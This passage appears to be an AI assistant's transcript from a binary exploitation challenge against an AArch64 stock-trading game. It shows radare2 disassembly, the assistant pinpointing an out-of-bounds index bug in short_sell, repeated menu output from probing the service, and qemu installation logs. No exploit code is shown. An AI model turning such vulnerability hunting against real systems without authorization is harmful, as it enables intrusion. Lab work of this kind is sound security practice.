DATA XREF from sym.short_sell @ 0x168c(x) │ └──> 0x00000f80 800000d0 adrp x0, 0x12000 │ 0x00000f84 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000f88 e21740f9 ldr x2, [var_28h] │ 0x00000f8c 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ ; DATA XREF from sym.short_sell @ 0x16d0(r) │ 0x00000f90 420001eb subs x2, x2, x1 │ 0x00000f94 010080d2 mov x1, 0 │ ┌─< 0x00000f98 40000054 b.eq 0xfa0 │ │ 0x00000f9c 9dfeff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.add_stock @ 0xf98(x) │ └─> 0x00000fa0 fd7b43a9 ldp x29, x30, [var_30h] │ 0x00000fa4 ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x00000fa8 c0035fd6 ret ; CALL XREF from sym.buy_stock @ 0x126c(x) ; CALL XREF from sym.sell_stock @ 0x13ec(x) ┌ 228: sym.find_user_stock (char *arg1, int64_t arg_40h); │ `- args(x0) vars(6:sp[0x10..0x38]) │ 0x000010b4 ff0301d1 sub sp, sp, 0x40 │ 0x000010b8 fd7b02a9 stp x29, x30, [var_20h] │ 0x000010bc fd830091 add x29, sp, 0x20 │ 0x000010c0 f31b00f9 str x19, [var_30h] │ 0x000010c4 e00700f9 str x0, [s2] ; arg1 │ 0x000010c8 800000b0 adrp x0, 0x12000 │ 0x000010cc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000010d0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000010d4 e10f00f9 str x1, [var_18h] │ 0x000010d8 010080d2 mov x1, 0 │ 0x000010dc e00740f9 ldr x0, [s2] │ 0x000010e0 00004039 ldrb w0, [x0] │ 0x000010e4 1f000071 cmp w0, 0 │ ┌─< 0x000010e8 61000054 b.ne 0x10f4 │ │ 0x000010ec 00008012 mov w0, -1 │ ┌──< 0x000010f0 1c000014 b 0x1160 │ ││ ; CODE XREF from sym.find_user_stock @ 0x10e8(x) │ │└─> 0x000010f4 ff1700b9 str wzr, [var_14h] │ │┌─< 0x000010f8 13000014 b 0x1144 │ ││ ; CODE XREF from sym.find_user_stock @ 0x1158(x) │ ┌───> 0x000010fc e01780b9 ldrsw x0, [var_14h] │ ╎││ 0x00001100 01e47ad3 lsl x1, x0, 6 │ ╎││ 0x00001104 800000f0 adrp x0, 0x14000 │ ╎││ 0x00001108 00600491 add x0, x0, 0x118 ; 0x14118 │ ╎││ ; obj.user_stocks │ ╎││ 0x0000110c 3300008b add x19, x1, x0 ; 0x14118 │ ╎││ ; obj.user_stocks │ ╎││ 0x00001110 e00740f9 ldr x0, [s2] ; const char *s │ ╎││ 0x00001114 1ffeff97 bl sym.imp.strlen ; size_t strlen(const char *s) │ ╎││ 0x00001118 e20300aa mov x2, x0 ; size_t n │ ╎││ 0x0000111c e10740f9 ldr x1, [s2] ; const void *s2 │ ╎││ 0x00001120 e00313aa mov x0, x19 ; const void *s1 │ ╎││ 0x00001124 4ffeff97 bl sym.imp.memcmp ; int memcmp(const void *s1, const void *s2, size_t n) │ ╎││ 0x00001128 1f000071 cmp w0, 0 │ ┌────< 0x0000112c 61000054 b.ne 0x1138 │ │╎││ 0x00001130 e01740b9 ldr w0, [var_14h] │ ┌─────< 0x00001134 0b000014 b 0x1160 │ ││╎││ ; CODE XREF from sym.find_user_stock @ 0x112c(x) │ │└────> 0x00001138 e01740b9 ldr w0, [var_14h] │ │ ╎││ 0x0000113c 00040011 add w0, w0, 1 │ │ ╎││ 0x00001140 e01700b9 str w0, [var_14h] │ │ ╎││ ; CODE XREF from sym.find_user_stock @ 0x10f8(x) │ │ ╎│└─> 0x00001144 e11740b9 ldr w1, [var_14h] │ │ ╎│ 0x00001148 a0000090 adrp x0, 0x15000 │ │ ╎│ 0x0000114c 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x00001150 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x00001154 3f00006b cmp w1, w0 │ │ └───< 0x00001158 23fdff54 b.lo 0x10fc │ │ │ 0x0000115c 00008012 mov w0, -1 │ │ │ ; CODE XREFS from sym.find_user_stock @ 0x10f0(x), 0x1134(x) │ └──└──> 0x00001160 e103002a mov w1, w0 │ 0x00001164 800000b0 adrp x0, 0x12000 │ 0x00001168 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000116c e30f40f9 ldr x3, [var_18h] │ 0x00001170 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001174 630002eb subs x3, x3, x2 │ 0x00001178 020080d2 mov x2, 0 │ ┌─< 0x0000117c 40000054 b.eq 0x1184 │ │ 0x00001180 24feff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.find_user_stock @ 0x117c(x) │ └─> 0x00001184 e003012a mov w0, w1 │ 0x00001188 f31b40f9 ldr x19, [var_30h] │ 0x0000118c fd7b42a9 ldp x29, x30, [var_20h] │ 0x00001190 ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x00001194 c0035fd6 ret ; CALL XREF from sym.add_stock @ 0xea8(x) ; CALL XREFS from sym.tick @ 0x1900(x), 0x1918(x) ┌ 132: sym.drand (int64_t arg_30h); │ `- args() vars(5:sp[0x8..0x30]) │ 0x00000dc0 ffc300d1 sub sp, sp, 0x30 │ 0x00000dc4 fd7b02a9 stp x29, x30, [var_20h] │ 0x00000dc8 fd830091 add x29, sp, 0x20 │ 0x00000dcc e00700fd str d0, [var_8h] │ 0x00000dd0 e10300fd str d1, [sp] │ 0x00000dd4 800000d0 adrp x0, 0x12000 │ 0x00000dd8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ddc 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000de0 e10f00f9 str x1, [var_18h] │ 0x00000de4 010080d2 mov x1, 0 │ 0x00000de8 06ffff97 bl sym.imp.rand ; int rand(void) │ 0x00000dec 0100621e scvtf d1, w0 │ 0x00000df0 e20340fd ldr d2, [sp] │ 0x00000df4 e00740fd ldr d0, [var_8h] │ 0x00000df8 4038601e fsub d0, d2, d0 │ 0x00000dfc 2008601e fmul d0, d1, d0 │ 0x00000e00 e0676ab2 mov x0, 0xffffffc00000 │ 0x00000e04 e03be8f2 movk x0, 0x41df, lsl 48 │ 0x00000e08 0100679e fmov d1, x0 │ 0x00000e0c 0118611e fdiv d1, d0, d1 │ 0x00000e10 e00740fd ldr d0, [var_8h] │ 0x00000e14 2028601e fadd d0, d1, d0 │ 0x00000e18 800000d0 adrp x0, 0x12000 │ 0x00000e1c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e20 e20f40f9 ldr x2, [var_18h] │ 0x00000e24 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e28 420001eb subs x2, x2, x1 │ 0x00000e2c 010080d2 mov x1, 0 │ ┌─< 0x00000e30 40000054 b.eq 0xe38 │ │ 0x00000e34 f7feff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.drand @ 0xe30(x) │ └─> 0x00000e38 fd7b42a9 ldp x29, x30, [var_20h] │ 0x00000e3c ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x00000e40 c0035fd6 ret - **Assistant:** There are repeated variable mixups: entered quantities get overwritten by stock/user indices in buy/sell/short paths. The most promising one is `short_sell`, where the second input is later reused as a stock index, giving out-of-bounds access if we choose a large “quantity.” - **Assistant:** Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. Final amount of money: 10000.00 - **Assistant:** I can interact with the service, and a normal 101-turn session just ends with `Final amount of money: 10000.00`, so the exploit has to drive money high or corrupt control/data. I’m checking whether we can run the AArch64 binary locally under qemu to iterate faster. - **Assistant:** Get:1 http://archive.ubuntu.com/ubuntu resolute InRelease [136 kB] Get:2 http://security.ubuntu.com/ubuntu resolute-security InRelease [136 kB] Get:3 http://security.ubuntu.com/ubuntu resolute-security/main amd64 Packages [34.7 kB] Get:4 http://security.ubuntu.com/ubuntu resolute-security/universe amd64 Packages [44.5 kB] Get:5 http://archive.ubuntu.com/ubuntu resolute-updates InRelease [136 kB] Get:6 http://archive.ubuntu.com/ubuntu resolute-backports InRelease [136 kB] Get:7 http://archive.ubuntu.com/ubuntu resolute/main amd64 Packages [1874 kB] Get:8 http://archive.ubuntu.com/ubuntu resolute/universe amd64 Packages [20.1 MB] Get:9 http://archive.ubuntu.com/ubuntu resolute/restricted amd64 Packages [189 kB] Get:10 http://archive.ubuntu.com/ubuntu resolute/multiverse amd64 Packages [352 kB] Get:11 http://archive.ubuntu.com/ubuntu resolute-updates/restricted amd64 Packages [34.7 kB] Get:12 http://archive.ubuntu.com/ubuntu resolute-updates/universe amd64 Packages [44.5 kB] Get:13 http://archive.ubuntu.com/ubuntu resolute-updates/main amd64 Packages [78.2 kB] Fetched 23.3 MB in 5s (4242 kB/s) Reading package lists... - **Assistant:** Building dependency tree... Reading state information... Solving dependencies... The following additional packages will be installed: qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt The following NEW packages will be installed: qemu-user qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt 0 upgraded, 4 newly installed, 0 to remove and 1 not upgraded. Need to get 14.8 MB of archives. After this operation, 137 MB of additional disk space will be used. Get:1 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-helper-virt-hwe all 1:10.2.1+ds-1ubuntu4 [45.0 kB] Get:2 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-virt amd64 1:10.2.1+ds-1ubuntu3 [40.4 kB] Get:3 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user amd64 1:10.2.1+ds-1ubuntu3 [14.7 MB] Get:4 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user-binfmt amd64 1:10.2.1+ds-1ubuntu3 [1678 B] Fetched 14.8 MB in 2s (8251 kB/s) Selecting previously unselected package ubuntu-helper-virt-hwe. (Reading database ... (Reading database ... 5% (Reading database ... 10% (Reading database ... 15% (Reading database ... 20% (Reading database ... 25% (Reading database ... 30% (Reading database ... 35% (Reading database ... 40% (Reading database ... 45% (Reading 